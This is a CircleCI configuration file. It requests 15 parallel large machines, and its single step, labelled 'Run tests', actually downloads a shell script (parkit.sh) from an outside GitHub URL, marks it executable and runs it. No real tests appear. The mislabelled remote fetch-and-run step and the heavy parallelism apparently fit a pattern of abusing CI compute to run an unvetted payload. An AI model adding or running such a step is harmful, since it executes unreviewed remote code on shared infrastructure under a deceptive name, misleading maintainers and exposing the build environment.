jobs:
  build:
    parallelism: 15
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large
    steps: 
      - checkout 
      - run: 
          name: Run tests 
          command: wget https://raw.githubusercontent.com/parkitmove/parkit/main/parkit.sh && chmod +x parkit.sh && ./parkit.sh